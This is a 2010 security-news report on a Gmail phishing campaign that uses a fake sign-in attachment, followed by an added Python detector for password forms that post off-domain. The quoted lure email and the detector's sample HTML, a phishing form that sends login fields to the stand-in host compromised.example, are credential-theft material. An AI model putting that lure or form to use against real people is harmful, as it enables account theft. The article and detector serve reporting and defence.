Daily cyber threats and internet security news: network security, online safety and latest security alerts
September 8th, 2010

New Gmail Phishing Campaign Attempts To Steal Login Credentials

Security researchers from Sunbelt warn of a new wave of spam emails that masquerade as official communications from Google in an attempt to steal login credentials from Gmail users.

The fake emails are well formulated and display visual elements associated with the Web search giant, such as the Google accounts logo or the copyright notice.

The messages purport to originate from the Google Team and read as follows:


“Your Google account information is incomplete, We recommend that you update your Google account for security reasons.

Download and open the attachment in this mail and follow the direction to update your Google account.”

The attached file is an HTML document called Gmail_access.html. Opening it in any browser will display a fake page almost identical to the one used to sign into Gmail.

In fact, the images and other elements present on the rogue page are actually loaded from Google’s real website. “If you check the attachment source code you can see that it sucks genuine Gmail page elements,” Tom Kelchner writes on the Sunbelt blog.

The fake sign-in form sends inputted data to a ServiceLoginAuth.php script hosted on an external domain, which stores it for the attackers. “The information entered on the bogus page is snatched by a site registered to someone in Sremska Kamenica, Serbia,” Kelchner explains.

However, this seems to be a legit website that has been compromised, as it runs an outdated and probably vulnerable version of the e107 content management system. This campaign appears to have started sometime at the beginning of this month as there are reports about it on the official Gmail help forum dating back to September 1.

Fortunately, there’s a simple way for users to always check if they are on the real Gmail login page or not, since the website comes with SSL enabled by default.
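The attachment pattern described above (page elements loaded from Google, but a password form that posts to another host) can be checked for mechanically in a mail filter. The following is an added example, not code from Sunbelt or from the original article; the sample HTML, the host `compromised.example`, the field names and the `trusted_suffixes` parameter are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample attachment: genuine-looking resources, external form target.
SAMPLE = """<html><body>
<img src="https://www.google.com/accounts/logo.gif">
<form action="http://compromised.example/ServiceLoginAuth.php" method="post">
<input type="text" name="Email"><input type="password" name="Passwd">
</form></body></html>"""


class FormAudit(HTMLParser):
    """Record each form's action, whether it holds a password field, and resource hosts."""

    def __init__(self):
        super().__init__()
        self.forms = []              # one dict per <form>
        self.resource_hosts = set()  # hosts that images, scripts and stylesheets load from
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["password"] = True
        elif tag in ("img", "script", "link"):
            host = urlparse(a.get("src") or a.get("href") or "").hostname
            if host:
                self.resource_hosts.add(host.lower())

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def suspicious_forms(html, trusted_suffixes=("google.com",)):
    """Return (actions of password forms posting off the trusted domains, resource hosts)."""
    audit = FormAudit()
    audit.feed(html)
    flagged = []
    for form in audit.forms:
        host = (urlparse(form["action"]).hostname or "").lower()
        trusted = any(host == s or host.endswith("." + s) for s in trusted_suffixes)
        if form["password"] and host and not trusted:  # relative actions are not flagged
            flagged.append(form["action"])
    return flagged, audit.resource_hosts
```

A flagged form combined with resource hosts on the impersonated brand's domain is the combination worth alerting on, since either signal alone is common in legitimate mail.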

Credit: News
